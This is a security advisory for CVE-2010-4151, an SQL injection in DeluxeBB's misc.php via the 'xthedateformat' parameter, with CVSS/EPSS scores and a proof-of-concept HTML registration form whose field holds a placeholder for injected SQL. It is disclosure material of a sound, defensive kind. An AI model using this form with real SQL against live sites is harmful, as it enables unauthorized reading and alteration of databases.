High-Tech BridgeHTB22641SQL Injection Vulnerability in DeluxeBB
6.8 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:M/Au:N/C:P/I:P/A:P
0.004 Low
EPSS
Percentile
69.1%
High-Tech Bridge SA Security Research Lab has discovered vulnerability in DeluxeBB which could be exploited to execute arbitrary SQL commands in application`s database.
- SQL injection vulnerability in DeluxeBB: CVE-2010-4151
An input validation error exists in the “xthedateformat” parameter in /deluxebb/misc.php. A remote attacker can send a specially crafted HTTP POST request to the vulnerable script and execute arbitrary SQL commands in application`s database. Successful exploitation may allow an attacker to read, modify, add or delete arbitrary data in database but requires “magic_quotes_gpc” to be disabled.
Exploitation example:
<form action=“http://deluxebb/misc.php?sub=register” method=“post” name=“main” >
<input type=“hidden” name=“name” value=“pentester” />
<input type=“hidden” name=“pass” value=“pentester” />
<input type=“hidden” name=“pass2” value=“pentester” />
<input type=“hidden” name=“email” value="[email protected]" />
<input type=“hidden” name=“hideemail” value=“0” />
<input type=“hidden” name=“languagex” value=“default” />
<input type=“hidden” name=“xthetimeoffset” value=“0” />
<input type=“hidden” name=“xthetimeformat” value=“24” />
<input type=“hidden” name=“xthedateformat” value=“'SQL_CODE_HERE” />
<input type=“hidden” value=“” name=“redirect” />
<input type=“submit” value=“Register” name=“submit” />
</form>
Related
6.8 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:M/Au:N/C:P/I:P/A:P
0.004 Low
EPSS
Percentile
69.1%